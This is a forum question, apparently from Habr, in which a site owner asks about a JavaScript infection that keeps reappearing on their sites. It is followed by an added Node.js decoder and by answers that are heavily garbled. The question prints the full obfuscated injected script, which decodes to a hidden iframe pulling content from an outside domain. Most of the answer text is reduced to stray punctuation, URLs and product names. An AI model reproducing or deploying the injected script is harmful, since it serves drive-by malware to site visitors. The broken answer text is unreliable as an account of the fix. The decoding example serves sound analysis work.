I have a problem with some JS virus on all my sites. They are located on different hosts, and on some of them this code appears.
<script> function c2670903e0i49d9f1a845f6b(i49d9f1a846377) { var i49d9f1a846737 = 16; return (parseInt(i49d9f1a846377, i49d9f1a846737)); } function i49d9f1a8472f3(i49d9f1a8476d9) { var i49d9f1a848679 = 2; var i49d9f1a847da9 = ''; i49d9f1a848e47 = String.fromCharCode; for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) { i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679)))); } return i49d9f1a847da9; } var r1a = ''; var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + 
'39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E'; document.write(i49d9f1a8472f3(i49d9f1a84922e)); </script>
NOD32 blocks the site because it believes that there is a virus. Removing code from sources does not help, because it reappears again. This cannot be the result of XSS because it appears even on static websites.
I tried to do a full check of my system, and that didn't help. The only thing on all websites is Google Analytics, which, I think, could not do this.
edit: you can see this, for example, at http://www.postuj.cz/test/ or http://flavicius.php5.cz/ .
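Added example, not part of the original post or written by any of its participants: Node.js code that decodes this kind of injected script statically, without evaluating it or writing anything to a page. The posted script stores its payload as two-digit hex codes split by an empty filler variable (r1a) and hands the decoded text to document.write; that text in turn carries %xx escapes for unescape(). The function names are hypothetical, and the sample input is constructed and points at the reserved example.invalid domain.

```javascript
// Added example: static decoder for the injected script's two encoding layers.
// Nothing is evaluated or written to a page; only strings are transformed.

// Rebuild the payload literal: quoted hex pieces joined with '+' and an
// empty-string filler variable (r1a on the page) that contributes nothing.
function joinPieces(expr) {
  return (expr.match(/'[0-9a-f]*'/gi) || []).map((s) => s.slice(1, -1)).join('');
}

// Layer 1: two hex digits per character, as the script's own loop reads them.
function hexLayer(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-f]/i.test(hex)) {
    throw new Error('payload is not an even-length hex string');
  }
  return hex.replace(/../g, (b) => String.fromCharCode(parseInt(b, 16)));
}

// Layer 2: the decoded text passes %xx escapes to unescape(); decode them
// in place instead of running the call.
function percentLayer(text) {
  return text.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Decode both layers and report what the script would have inserted.
function analyze(expr) {
  const layer1 = hexLayer(joinPieces(expr));
  const layer2 = percentLayer(layer1);
  const iframes = layer2.match(/<iframe\b[^>]*>/gi) || [];
  return {
    layer1,
    layer2,
    hiddenIframe: iframes.some((t) => /visibility\s*:\s*hidden|display\s*:\s*none/i.test(t)),
    urls: layer2.match(/https?:\/\/[^\s'"<>]+/gi) || [],
  };
}

// Constructed sample (not the payload from the page): a harmless string
// pointing at the reserved example.invalid domain, encoded the same two ways.
const inner = "<iframe src='http://example.invalid/?' style='visibility:hidden'></iframe>";
const pct = [...inner].map((c) => '%' + c.charCodeAt(0).toString(16)).join('');
const plain = "<script>document.write(unescape('" + pct + "'));</script>";
const SAMPLE = Buffer.from(plain, 'latin1').toString('hex')
  .match(/.{1,7}/g).map((p) => "'" + p + "'").join(' + r1a + ');

const report = analyze(SAMPLE);
console.log(report.layer2);
console.log('hidden iframe:', report.hiddenIframe, 'urls:', report.urls);
```

To inspect a script found on a server, pass analyze() the text of the concatenation expression assigned to the payload variable; the urls and hiddenIframe fields give the values to search for in the served pages and the web server's logs.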
, , , . iframe http://ecom.rarebreedfootwear.com/? ( - URL-, - ).
: , , , JavaScript, , iframe - . , .
ETA:
, , hxxp://flavicius.php5.cz/
. , URL, . Apache , script .
, , , , , : , , . , , WordPress, .
Vundo . , , javascript ( , ). Malwarebytes 'Anti-Malware. , . , Vundo .
Source: https://habr.com/ru/post/1705972/